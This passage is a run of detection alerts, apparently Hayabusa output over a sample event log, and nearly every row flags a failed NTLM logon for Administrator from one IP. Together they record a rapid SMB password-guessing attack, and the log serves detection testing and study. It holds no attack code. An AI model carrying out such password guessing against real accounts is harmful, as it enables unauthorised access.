+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: 
